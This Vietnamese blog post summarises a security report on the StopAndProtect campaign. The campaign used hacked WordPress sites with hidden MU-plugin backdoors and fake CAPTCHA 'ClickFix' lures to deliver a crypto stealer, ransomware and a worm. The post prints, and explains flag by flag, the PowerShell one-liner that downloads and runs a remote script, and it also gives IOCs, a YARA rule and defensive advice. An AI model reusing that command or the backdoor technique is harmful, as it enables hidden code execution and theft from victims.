# Gần 2.000 Website WordPress Bị Chiếm Dụng: Bí Mật Phía Sau Chiến Dịch StopAndProtect

Bạn có tin rằng chỉ một cú nhấp chuột vào ô xác minh *"Tôi không phải là người máy"* (CAPTCHA) quen thuộc lại có thể rút sạch ví tiền điện tử và biến máy tính của bạn thành "nô lệ" trong một mạng lưới tội phạm toàn cầu?

Tháng 5/2026, các chuyên gia an ninh mạng tại **Check Point Research** đã vạch trần **StopAndProtect** – một chiến dịch ngầm quy mô lớn đang âm thầm biến gần **2.000 website WordPress** uy tín thành những "bãi mìn" kỹ thuật số. Tuy nhiên, đây không đơn thuần là một vụ phát tán mã độc thông thường. Những gì ẩn giấu đằng sau chiến dịch này sẽ khiến bạn đi từ bất ngờ này đến kinh ngạc khác:

*   **Cú lừa ClickFix ma quái:** Làm thế nào mà một thông báo CAPTCHA giả mạo lại có thể lừa nạn nhân tự tay dán mã độc vào máy tính của mình mà không hề nghi ngờ?
    
*   **"Con dao Thụy Sĩ" của giới tội phạm:** Tại sao StopAndProtect không chỉ là Ransomware đòi tiền chuộc, mà còn là một kho vũ khí đa năng—tự động lục soát ví Crypto, chiếm quyền WhatsApp để do thám danh bạ, và âm thầm chụp ảnh màn hình nạn nhân **30 giây/lần**?
    
*   **Pha "tự bóp" ngớ ngẩn nhất lịch sử (The OPSEC Blunder):** Kịch tính nhất của chiến dịch nằm ở việc kẻ chủ mưu đã phạm một sai lầm chết người: **Tự lây nhiễm mã độc vào chính máy tính cá nhân của mình!** Chính sự cố hài hước này đã vô tình dâng nộp cho giới bảo mật kho lưu trữ 31.000 bức ảnh màn hình bí mật, cùng toàn bộ công cụ điều hành botnet viết bằng ngôn ngữ... Visual Basic 6 từ thập niên 90.
    

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/938e3de7-bca9-416f-8373-c34cdff7084f.png align="center")

## **Tại Sao Lại Gọi Là "ClickFix"?**

**ClickFix** (ghép từ *Click* - Nhấp chuột và *Fix* - Sửa lỗi) là một kỹ thuật lừa đảo tâm lý (Social Engineering) thế hệ mới vô cùng nguy hiểm.

*   **Điểm khác biệt với lừa đảo truyền thống:** Trước đây, tin tặc thường lừa bạn **tải về** một file `.exe` hoặc `.zip` rồi mở ra. Tuy nhiên, các trình duyệt hiện đại (Chrome, Edge) và phần mềm diệt virus sẽ cảnh báo ngay khi bạn tải file lạ.
    
*   **Cách ClickFix vượt rào:** ClickFix **không tải bất kỳ file nào về đĩa cứng**. Thay vào đó, nó lợi dụng lòng tin và thói quen của người dùng, lừa bạn **tự tay chép và dán lệnh độc hại vào hệ thống**. Vì chính bạn là người thực thi lệnh, các phần mềm bảo mật thường lầm tưởng đó là thao tác hợp lệ của quản trị viên!
    

## **Mạng Lưới "Nô Lệ" WordPress – Hạ Tầng Tàng Hình Của Tin Tặc**

Để bắt đầu một chiến dịch lừa đảo quy mô lớn, kẻ tấn công cần máy chủ để chứa mã độc và điều khiển tấn công. Thay vì bỏ tiền thuê máy chủ riêng (dễ bị cảnh sát mạng truy vết và khóa lại), nhóm **StopAndProtect** đã chọn cách **chiếm đoạt gần 2.000 website WordPress** kém bảo mật trên toàn thế giới.

### **Tuyệt chiêu "Backdoor tàng hình" qua MU-Plugins:**

Các trang web bị hack chủ yếu chạy phiên bản WordPress cũ (từ năm 2021 dính tới 40 lỗ hổng) hoặc cài plugin chưa vá. Kẻ tấn công cắm chốt trên các website này bằng một chiêu thức cực kỳ tinh vi:

1.  **Cài đặt Must-Use Plugin (MU-Plugin):** Kẻ tấn công tải lên file script `mu-uploader-installer.php`. Script này âm thầm tạo một plugin đặc biệt tại đường dẫn `wp-content/mu-plugins/wp-sec.php`.
    
    Nói một cách dễ hiểu\*\*:\*\* Trong WordPress, *MU-Plugin* là dạng plugin "bắt buộc chạy" – nó tự khởi động mỗi khi có người truy cập web nhưng **hoàn toàn không hiển thị trong danh sách Plugin ở giao diện quản trị**. Quản trị viên rất khó phát hiện!
    
2.  **Tạo Cổng Cửa Sau (Hidden REST API Endpoint):** Plugin ẩn này mở ra cổng `/wp-json/wp-sec/v1/upload`. Kẻ tấn công chỉ cần gửi yêu cầu kèm mật khẩu cứng (hardcoded) là có thể tải lên bất kỳ tệp tin độc hại nào (kể cả file `.php` để chiếm toàn bộ quyền máy chủ).
    
3.  **Xóa dấu vết cài đặt:** Ngay sau khi thiết lập xong cửa hậu, file cài đặt ban đầu tự hủy (`self-delete`), khiến mọi vết tích biến mất.
    

## **Kịch Bản "ClickFix" – Cú Lừa CAPTCHA Tinh Vi Đến Mức Nào?**

### **BƯỚC 1: Sàng Lọc Mục Tiêu & Kiểm Tra Môi Trường**

Khi bạn truy cập vào một website WordPress đã bị tin tặc chiếm quyền, kịch bản độc hại `verify.php` nằm ẩn trên máy chủ sẽ lập tức khởi chạy một trình kiểm tra ngầm:

1.  **Kiểm tra Hệ Điều Hành:**
    
    *   Nếu trình duyệt gửi thông tin là **Windows OS** ➔ Kích hoạt bẫy ClickFix.
        
    *   Nếu là **macOS, Linux, Android hoặc iOS** ➔ Bỏ qua, cho phép xem nội dung website bình thường.
        
2.  **Mục đích của việc sàng lọc:**
    
    *   Tránh gây nghi ngờ đối với người dùng di chuyển bằng điện thoại hoặc máy Mac.
        
    *   Đảm bảo câu lệnh PowerShell chuẩn bị tung ra sẽ chạy thành công 100% (vì chỉ hệ điều hành Windows mới có PowerShell mặc định).
        

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/5254c2e6-a5f8-442a-868c-5669a8864a35.png align="center")

### **BƯỚC 2: Phủ Giao Diện CAPTCHA Giả Mạo (UI Overlay)**

Ngay khi xác định nạn nhân dùng Windows, một cửa sổ giả mạo đè lên toàn bộ màn hình (Overlay), che khuất nội dung trang web gốc.

*   **Hình thức cực kỳ giống thật:** Giao diện được thiết kế nhái theo các dịch vụ xác minh uy tín như Google reCAPTCHA, Cloudflare hoặc hCaptcha với các biểu tượng khóa an toàn, dòng chữ *"Security Check"* hoặc *"Verify you are human"*.
    
*   **Tạo sự cố giả:** Màn hình hiển thị thông báo lỗi như: *"Trình duyệt của bạn gặp sự cố kết nối an toàn. Vui lòng nhấn xác minh để tiếp tục truy cập."*
    

### **BƯỚC 3: "Bắt Cóc" Bộ Nhớ Tạm**

Đây là mắt xích kỹ thuật ngầm then chốt của ClickFix:

1.  Ngay khi nạn nhân nhấp vào ô *"I am not a robot"* hoặc nút *"Verify"*, một kịch bản JavaScript ngầm (tệp `vcapcha.js`) trên trình duyệt lập tức được kích hoạt.
    
2.  Kịch bản này gọi lệnh hệ thống của trình duyệt `navigator.clipboard.writeText(...)` để **âm thầm chép một đoạn mã độc PowerShell cực kỳ phức tạp vào Bộ nhớ tạm (RAM/Clipboard)** của nạn nhân mà không phát ra bất kỳ âm thanh hay cảnh báo nào.
    

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/59e5d4c3-b7b3-48f0-8c5c-e062bb1c0ed2.png align="center")

### **BƯỚC 4: Thao Túng Tâm Lý – Lừa Nạn Nhân "Tự Kích Hoạt"**

Sau khi mã độc đã nằm sẵn trong bộ nhớ tạm, màn hình CAPTCHA giả mạo thay đổi giao diện, hiển thị một hướng dẫn 3 bước nhìn có vẻ rất "kỹ thuật" nhưng thực chất là một cái bẫy:

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/940b3619-f41c-41ba-8c38-8c6897ec5954.png align="center")

#### **Phân tích tâm lý nạn nhân ở bước này:**

*   Nạn nhân tưởng rằng dòng chữ mình dán vào là một **chuỗi mã xác minh/token** an toàn.
    
*   Thao tác `Win + R` (mở hộp thoại Run) và `Ctrl + V` diễn ra rất nhanh (chỉ mất 2-3 giây), nạn nhân thực hiện theo phản xạ mà không kịp suy nghĩ hay kiểm tra xem dòng lệnh mình dán vào thực chất chứa cái gì.
    

### **BƯỚC 5: Thực Thi Lệnh Ngầm**

Ngay khi nạn nhân nhấn **Enter**, hộp thoại Run của Windows sẽ thực thi câu lệnh PowerShell độc hại. Hãy cùng bóc tách ý nghĩa kỹ thuật của câu lệnh này:

`powershell -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('https://<C2>/vcapcha.ps1'))`

*   `-w hidden` **(WindowStyle Hidden):** Ẩn hoàn toàn cửa sổ đen PowerShell. Nạn nhân bấm Enter xong sẽ không thấy cửa sổ nào hiện ra, tưởng rằng hệ thống đang "âm thầm xác minh".
    
*   `-ep bypass` **(ExecutionPolicy Bypass):** Bỏ qua mọi chính sách ngăn chặn chạy file script của Windows (Execution Policy).
    
*   `IEX` **(Invoke-Expression):** Thực thi trực tiếp đoạn mã được tải về từ internet ngay trên bộ nhớ RAM mà không cần lưu file xuống đĩa cứng.
    
*   `DownloadString('.../vcapcha.ps1')`**:** Tải kịch bản lây nhiễm chính `vcapcha.ps1` từ máy chủ WordPress bị hack.
    

### **BƯỚC 6: Báo Cáo Log Về Máy Chủ C2 & Chuyển Tiếp Sang Stage 2**

Ngay khi đoạn mã `vcapcha.ps1` chạy thành công:

1.  **Gửi dữ liệu trinh sát:** Mã độc gửi một yêu cầu HTTP chứa IP nạn nhân, thời gian thực thi, phiên bản Windows về Endpoint `/wp-content/plugins/verify/proxy.php` trên website WordPress bị chiếm quyền.
    
2.  **Kích hoạt chuỗi lây nhiễm tiếp theo:** Tiến hành giải mã và nạp **Stage 1 & Stage 2 (.NET Loaders)** vào RAM để chuẩn bị bung bộ vũ khí trộm ví Crypto và Ransomware (Stage 3).
    
3.  **Trả lại giao diện:** Màn hình CAPTCHA giả mạo biến mất, trình duyệt tự động làm mới (Reload) lại trang web gốc. Nạn nhân thản nhiên đọc báo/xem web mà không hề biết rằng máy tính của mình đã hoàn toàn bị khống chế!
    

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/871aebc7-58ad-4239-8308-f00d4aee7096.png align="center")

### **TÓM TẮT QUY TRÌNH BẰNG BẢNG SO SÁNH**

| **Tiêu chí** | **Phương thức Lừa Đảo Cũ** | **Kịch Bản ClickFix (Mới)** |
| --- | --- | --- |
| **Thao tác nạn nhân** | Tải file `.exe`/`.zip` ➔ Mở file ➔ Cài đặt. | Nhấn CAPTCHA ➔ Bấm `Win+R` ➔ `Ctrl+V` ➔ `Enter`. |
| **Cảnh báo trình duyệt** | Hiện cảnh báo: *"File này có thể gây hại"*. | **Không hề có cảnh báo** (vì dán lệnh thủ công). |
| **Lưu trữ trên đĩa** | Ghi file độc hại xuống đĩa cứng. | **Chạy thẳng trên RAM** (In-Memory Execution). |
| **Khả năng qua mặt AV** | Dễ bị Antivirus bắt khi ghi file. | Tỷ lệ qua mặt Antivirus cực kỳ cao. |

## **Bộ Vũ Khí Đa Năng Stage 3 – Từ Trộm Ví Crypto Đến Tống Tiền**

Khi đã nằm sâu trong máy tính, StopAndProtect bắt đầu kích hoạt các mô-đun phá hoại tùy theo mục đích của tin tặc.

### **SilentDataCollector – "Kẻ Trộm Thầm Lặng" Săn Ví Crypto**

Đây là mô-đun nguy hiểm nhất đối với các nhà đầu tư tiền điện tử:

*   **Tự động trích xuất Ví Crypto:** Quét sạch ổ cứng, nén và mã hóa các tệp chứa cụm từ khôi phục (Seed Phrase), mật khẩu trình duyệt, file ví tiền điện tử dưới định dạng: `<TÊN_MÁY>wallet_V<PHIÊN_BẢN>_<NGÀY_GIỜ>.zip.encrypted`
    
*   **Do thám bằng WhatsApp Automation:** Kẻ tấn công gửi từ khóa (tên liên hệ) từ C2 xuống. Mã độc chờ nạn nhân không dùng máy, sau đó **tự động điều khiển WhatsApp** (bản Web/Desktop), gõ từ khóa vào ô tìm kiếm, mở thông tin danh bạ và chụp ảnh màn hình lấy số điện thoại của mục tiêu.
    
*   **Chụp ảnh màn hình liên tục:** Tự động chụp lại màn hình làm việc của nạn nhân **30 giây/lần**.
    
*   **Keylogger thông minh:** Ghi lại mọi phím bấm và tự động lọc ra các địa chỉ Email/Tài khoản hợp lệ.
    

### **SilentEncryptor (Ransomware mã hóa dữ liệu)**

*   Mã hóa toàn bộ dữ liệu hoặc các máy tính có tên (Hostname) được chỉ định từ C2.
    
*   Khóa mã hóa AES 32-byte được kết hợp từ tên máy và mật khẩu từng file.
    
*   Hiển thị thông báo đòi tiền chuộc và hướng dẫn thanh toán qua Bitcoin/USDT.
    

### **Sâu Mạng Lan Lan**

*   Tự động quét các ổ đĩa mạng chia sẻ (SMB) và thiết bị USB cắm vào máy để nhân bản mã độc sang các máy tính khác trong cùng mạng LAN doanh nghiệp.
    

### **Khóa Máy & Chat Tống Tiền**

*   **LockScreen:** Khóa chặt bàn phím và chuột, biến màn hình thành bảng thông báo nộp tiền chuộc kèm mã QR.
    
*   **SimpleChatProxy:** Mở một ứng dụng chat trực tiếp giữa nạn nhân và tin tặc để thương lượng giá giải mã.
    

## **Thống Kê Nạn Nhân & Bản Đồ Phân Bố Địa Lý**

Tính đến ngày **24/07/2026**, chiến dịch StopAndProtect đã lây nhiễm thành công trên **6.000+ địa chỉ IP duy nhất**.

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/03dd30e5-f350-4806-bfe0-0cec82bd5be2.png align="center")

## IOC

<table style="min-width: 50px;"><colgroup><col style="min-width: 25px;"><col style="min-width: 25px;"></colgroup><tbody><tr><td colspan="1" rowspan="1"><p>compromised websites</p></td><td colspan="1" rowspan="1"><p>maximumrock[.]ro<br>platinumcar[.]ca<br><a target="_self" rel="noopener noreferrer nofollow" class="text-primary underline underline-offset-2 hover:text-primary/80 cursor-pointer" href="http://norakremer.co" style="pointer-events: none;">norakremer.co</a>[.]uk<br>pharmart[.]ae<br>ksr-racingparts[.]com</p></td></tr><tr><td colspan="1" rowspan="1"><p>compromised base C&amp;C websites</p></td><td colspan="1" rowspan="1"><p><a target="_self" rel="noopener noreferrer nofollow" class="text-primary underline underline-offset-2 hover:text-primary/80 cursor-pointer" href="http://v-k.com" style="pointer-events: none;">v-k.com</a>[.]ua<br>www.lapellelaser[.]pl<br>www.parsrulman[.]com<br>mectcalcutta[.]com<br>discherniation[.]com</p></td></tr><tr><td colspan="1" rowspan="1"><p>PowerShell script stage 1</p></td><td colspan="1" rowspan="1"><p>cab7f141fd6f2c58055b3731ef6a64b8a2d4d88a974770b047da19c0904322f0</p></td></tr><tr><td colspan="1" rowspan="1"><p>PowerShell script stage 2</p></td><td colspan="1" rowspan="1"><p>cc8aa2bd7bf74ca0bbc5cb03a7b18eae73094b450d11654528c05685fe12e0c9</p></td></tr><tr><td colspan="1" rowspan="1"><p>stage 1 – downloader</p></td><td colspan="1" rowspan="1"><p>99bcb531d6dd3c93d3f28f03d6e4659c865a4ffbd2fb514e809017f3446a940b<br>8337bf29100a5871b1275227006dc2a43b21b751e5ce7e2032364fd78af59ac5<br>4dee2fe98d4da75ffb259c03b50202212dafc85691429a28641a8068eddea504</p></td></tr><tr><td colspan="1" rowspan="1"><p>stage 2 – downloader &amp; loader</p></td><td colspan="1" rowspan="1"><p>9765b1342cc7eb982a73bb1f94c6c500b63dc817073b76ea926c1097078d3527<br>7d3604d0728b242c72bd144b8661ebf63c1042a4f5dd441bc8c8507c701df20c<br>976cfa57e1efacbe517b7e3441e9473d275ec1d9ad8ab69ddf8ae3a966aaa153</p></td></tr><tr><td colspan="1" rowspan="1"><p>stage 3 – encryptor</p></td><td colspan="1" rowspan="1"><p>b79b9b027f76579555069a7506d946648a8cb3126c0dda837dc9fee0e5c79489<br>65550f6d0ffec8421f703cdc7273d9c0563b3d480fe6702bad294a18afe72143<br>0080d0dd72eda4850a02e51c0e5c6f768423dfe970cafae2ab52ceee75972b40</p></td></tr><tr><td colspan="1" rowspan="1"><p>stage 3 – SMB/USB worm</p></td><td colspan="1" rowspan="1"><p>8d1e23630a6695fa9c793d73832f59436c98bba30ed81c16d01b549bd17feab4<br>10babb15e08f9fbd72cce11713a273b971c910dd5bdb989a3f6ff4d9c8e372c0<br>f042240c3de00c46dee625916bf246b7e87481e4081a6a97208b091409766e41</p></td></tr><tr><td colspan="1" rowspan="1"><p>stage 3 – lockscreen</p></td><td colspan="1" rowspan="1"><p>11a635d70444605ede1de0aa227a9fd7cfa4554e75bea93ce18b639ca571a42e<br>2adbb2c206be7f23bf77f8f50d1ac0f809511c0b4591421931f81a6eaa42c68c<br>38602b76f6c65644b01fa4d81708251c159a883253cda8876396dc7212324ab9</p></td></tr><tr><td colspan="1" rowspan="1"><p>stage 3 – credential stealer</p></td><td colspan="1" rowspan="1"><p>23cbabfe3ca3a7f1eb365f772d6a4ed8095cb8f7755622cc82e804478259dc70</p></td></tr><tr><td colspan="1" rowspan="1"><p>stage 3 – VBS spreader</p></td><td colspan="1" rowspan="1"><p>b3dff910b350ace27d64cbd79405cb154a1967e366d7b88170c3e8303b1d08ad</p></td></tr><tr><td colspan="1" rowspan="1"><p>stage 3 – chat utility</p></td><td colspan="1" rowspan="1"><p>3ed8f2cc8da4853fd770ff38f0cbce6d9d4a84e75a828fc0cec3e3ec60db94f9<br>3ba161ca7b8dcf389ec3236c9ddfb943e9d1766181b1b81a227649cad46132a8</p></td></tr></tbody></table>

## **Yara Rule**

rule StopAndProtectOperation

**{**

meta:

description = "Detects StopAndProtect Operation"

author = "Check Point Research"

date = "2026-05-26"

modified = "2026-05-26"

hash = "712E557373FBA45BDD66D52E395B8AF7CCF7006E6E82D4E1DB0736E738D0D4FB"

strings:

$a = "C:\\\\Users\\\\marks\\\\source\\\\"

condition:

all **of** them

**}**

## Khuyến Nghị

### **Tuyệt Đối KHÔNG Chạy Lệnh** `Win + R` **➔** `Ctrl + V` **➔** `Enter`

*   Không có CAPTCHA hay dịch vụ xác minh nào yêu cầu bạn tự dán lệnh PowerShell vào máy tính. **Thấy yêu cầu này = 100% Lừa đảo ClickFix!**
    

### **Mẹo Thử Bằng Notepad**

*   Nếu lỡ bấm nút xác minh nghi vấn, hãy mở **Notepad** lên và dán (`Ctrl + V`) vào đó trước. Nếu thấy hiện câu lệnh `powershell...` ➔ Xóa ngay, bạn vừa né được một cú lừa!
    

### **Bảo Vệ Ví Crypto Bằng Mọi Giá**

*   **KHÔNG** lưu 12/24 từ khôi phục (Seed Phrase) hay Private Key dưới dạng file text, ảnh chụp trên máy tính hay Cloud.
    
*   **CHỈ** viết ra giấy/khắc kim loại và cất nơi an toàn.
    
*   Dùng **Ví cứng** (Ledger, Trezor) cho tài sản lớn.
    

### **Quản Lý Mật Khẩu & Dọn Dẹp Máy Tính**

*   **KHÔNG lưu mật khẩu trên trình duyệt** (mã độc rất dễ rút cắp). Hãy dùng trình quản lý mật khẩu riêng (Bitwarden, 1Password) + Bật 2FA qua ứng dụng.
    
*   **KHÔNG tải phần mềm bẻ khóa (Crack/Keygen)** vì đây là con đường chính phát tán mã độc.
    

## Tài Liệu Tham Khảo

[https://research.checkpoint.com/2026/thousands-of-hacked-wordpress-sites-one-operation-unmasking-stopandprotect/](https://research.checkpoint.com/2026/thousands-of-hacked-wordpress-sites-one-operation-unmasking-stopandprotect/)

[https://thehackernews.com/2026/08/stopandprotect-uses-nearly-2000-hacked.html](https://thehackernews.com/2026/08/stopandprotect-uses-nearly-2000-hacked.html)

[https://www.cryptopolitan.com/it/2000-hacked-wordpress-traps-crypto-users/](https://www.cryptopolitan.com/it/2000-hacked-wordpress-traps-crypto-users/)
